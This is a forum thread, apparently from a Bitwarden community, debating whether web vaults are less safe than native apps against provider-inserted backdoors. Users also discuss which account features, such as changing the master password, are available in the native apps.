As a general rule, web apps are not safe enough for applications where you don’t trust service provider, such as password managers or e2ee messaging apps*. For this reason, I would like Bitwarden to not have web version at all. But if there is a web version, at least these two things should be done:
Users must be warned that web apps are less safe than the native apps.
Native apps should have full functionality. I noticed that there is no ability to change master password or its hint on the native apps, as well as account deletion and password reporters (premium). These are the features I am requesting.
*Reason for this is that in web apps code is re-delivered every time the app loads, thus it can be undetectably backdoored.
Hi @kamran - you state above that the “native apps” for Bitwarden do not allow password changes. That’s not quite true. The desktop apps for Windows, MacOS, and Linux all provide this feature, as does the Android mobile app.
Also, I don’t think it is fair to say that Bitwarden apps can be “undetectably backdoored” - in fact, the Bitwarden code is entirely opensource, meaning that everyone who would like to monitor changes to the code has the ability to do so, making it quite transparent (and it likely has many more sets of eyes on it than the popular, proprietary commercial alternatives).
There is a wealth of information about the security measures in place with Bitwarden that you might find useful on the help pages starting with:
Even more so is fact that Bitwarden is security focused at its core, they have undergone regular audits and security testing by 3rd party firms.
Everything from an extensive code audit, to penetration testing, etc. all being open and disclosed to the public to view, which is extremely rare.
Audits aren’t cheap, and they are rarely ever disclosed publicly either.
And the same thing happens in mobile app, but it does not allow me to take screenshot.
I do appreciate the fact that Bitwarden is open source and audited. I was simply saying that this is not enough (but it is necessary) to protect from backdoors. Web apps in general are only secure against third parties, not against service provider. And the reason is that if a backdoor added to production code (not to GitHub), it is detectable in native app since it is enough to download it once. But web app gets downloaded from Bitwarden server every time, while it is not possible to check for backdoors in every usage.
While I agree this may arguably be a useful feature, and in an ideal world, anything that can be done in the web interface would also be able to be done on desktop version and even mobile apps and browser extensions.
I am a bit confused with
Could you provide some more detail in what you mean here? Is the service provider your ISP, the Microsoft Azure data centre, or Bitwarden as the provider of the applications?
I guess I am trying to understand the scenario you are trying to protect against and your threat model here. As well as further understand any concerns you may have.
GitHub is where the Bitwarden production code lives, all in the public eye of opensource. If the theory is that the code running the app (either web or mobile) has been changed or somehow altered from the source code in GitHub, then arguably at that point anything could have been changed regardless of if it was mobile or web.
In this context, “service provider” refers to either Azure, AWS, etc. or Bitwarden team, but it does not refer to ISP or a VPN provider, since TLS protects users from them. The threat model/scenario here is that service provider may want to insert a backdoor directly into production code, without adding it to GitHub. Theoretically, such a backdoor would be much easier to detect in native apps than it is in web apps, since in web apps javascript code is loaded every time, and backdooring it only once is enough to steal a user’s master password. And yes, you can simply ignore “web apps are not secure” part and just add full functionality to native apps.
Correct - you must use the Web Vault if you want to change your Master Password. For security reasons, I don’t think that is likely to change.
Assuming you are using a strong and unique password, there really should be no need to ever change your master password, unless of course you have reason to believe it may have been compromised.
